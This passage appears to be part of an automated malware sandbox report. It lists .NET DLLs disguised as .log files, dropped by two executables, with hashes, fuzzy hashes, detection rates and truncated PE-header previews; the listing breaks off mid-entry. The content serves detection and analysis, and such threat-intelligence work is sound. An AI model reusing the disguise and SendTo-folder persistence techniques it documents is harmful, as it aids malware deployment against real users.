                                          • Antivirus: ReversingLabs, Detection: 5%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\GbeNbtEV.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):85504
                                          Entropy (8bit):5.8769270258874755
                                          Encrypted:false
                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 71%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          C:\Users\user\Desktop\IIQWghSC.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):36352
                                          Entropy (8bit):5.668291349855899
                                          Encrypted:false
                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\IeQwxcIQ.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):50176
                                          Entropy (8bit):5.723168999026349
                                          Encrypted:false
                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\LgDeSLNM.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):41472
                                          Entropy (8bit):5.6808219961645605
                                          Encrypted:false
                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\LqWvJvsp.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):24064
                                          Entropy (8bit):5.4346552043530165
                                          Encrypted:false
                                          SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                          MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                          SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                          SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                          SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 6%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\LyGNneTv.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):38400
                                          Entropy (8bit):5.699005826018714
                                          Encrypted:false
                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                          MD5:87765D141228784AE91334BAE25AD743
                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 9%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\MUHnEZJK.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):38400
                                          Entropy (8bit):5.699005826018714
                                          Encrypted:false
                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                          MD5:87765D141228784AE91334BAE25AD743
                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 9%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\PTVdvIcA.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):33280
                                          Entropy (8bit):5.634433516692816
                                          Encrypted:false
                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\QKxdLVJD.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):32256
                                          Entropy (8bit):5.631194486392901
                                          Encrypted:false
                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\RHZlgVYy.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):28160
                                          Entropy (8bit):5.570953308352568
                                          Encrypted:false
                                          SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                          MD5:A4F19ADB89F8D88DBDF103878CF31608
                                          SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                          SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                          SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 4%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\RjzUmbxe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):33280
                                          Entropy (8bit):5.634433516692816
                                          Encrypted:false
                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\SWHMRrhv.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):294912
                                          Entropy (8bit):6.010605469502259
                                          Encrypted:false
                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                          C:\Users\user\Desktop\UPWuCoSt.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):24064
                                          Entropy (8bit):5.4346552043530165
                                          Encrypted:false
                                          SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                          MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                          SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                          SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                          SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 6%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\VMyCYnho.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):70144
                                          Entropy (8bit):5.909536568846014
                                          Encrypted:false
                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\VZqLtXxX.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):34816
                                          Entropy (8bit):5.636032516496583
                                          Encrypted:false
                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                          MD5:996BD447A16F0A20F238A611484AFE86
                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\WDaDoBOr.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):38912
                                          Entropy (8bit):5.679286635687991
                                          Encrypted:false
                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\XACLJBdm.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):64000
                                          Entropy (8bit):5.857602289000348
                                          Encrypted:false
                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\XbctOGCS.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):70144
                                          Entropy (8bit):5.909536568846014
                                          Encrypted:false
                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\YKVbAlIQ.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):50176
                                          Entropy (8bit):5.723168999026349
                                          Encrypted:false
                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\aVrcADnQ.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):28160
                                          Entropy (8bit):5.570953308352568
                                          Encrypted:false
                                          SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                          MD5:A4F19ADB89F8D88DBDF103878CF31608
                                          SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                          SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                          SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 4%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\bAMSHhIJ.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):38912
                                          Entropy (8bit):5.679286635687991
                                          Encrypted:false
